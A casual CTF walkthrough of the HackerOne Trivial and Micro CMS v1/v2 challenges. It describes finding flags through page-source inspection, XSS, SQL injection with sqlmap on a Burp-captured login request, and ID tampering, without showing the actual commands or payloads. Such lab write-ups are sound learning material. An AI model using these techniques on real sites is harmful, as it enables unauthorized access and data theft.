HackerOne CTF Trivial and Micro CMS V1 & V2

hello everyone,Let’s solve some hackerone CTF’s.

Now let’s solve.If we get 26 points we’ll earn a invitation.

1.Trivival:

It’s one of the easiest thing.

So , let’s have a look at the page source.

As u can see we have a background image.Now let’s open the image,

There we go. we got our flag..Done…

2.Micro CMS V1

it’s the basic challenge.It comes with four flags now we have to find all the four flags.

Now let’s try to create a new page..and perform some xss.

After that click on CREATE and then go to home page..It will give u the flag.

So we got the first flag.For second flag open testing..

Look how the pages are indexed. “page.php?id=1”Now let’s check for any sql error.Not found .But i found the sql error in edit page..

So we found our second flag.

Now let’s try to get more.As we can observe from the above screenshot.We have a page id’s now let’s try to tamper the input.and then we got this..

Ok we got our flag-3 .Now let’s try for flag-4

So we got a button here. Now let’s try to inject the javascript here.

Now save it and look at the source code and we got the flag.

So,we’ve got all the flags.

3.Micro CMS V2

it’s one of the easiest one..it comes with three flags.

Let’s go

So, here is the thing.we need to be an admin to edit or add pages.For that we need to find the username and password.

Now it’s time for burpsuite.fireup your burpsuite and intercept the traffic.

So here is the login page.Now give the randon username and password.

so this is our request header.save this req. header in a txt file.Now fireup our sqlmap to show all the databases.

Using the above command i’m going extract the databases.

So we go tone flag and login credentials.

Now we’ll use this credentials and login for the second flag.

Now for the thrid flag. i’ve gone for the hint.

So based on the hint. i’ve created a html page to get the access

use this html to get the third flag..And it’s done…

HAPPY HACKING….

PEACE….✌️✌️✌️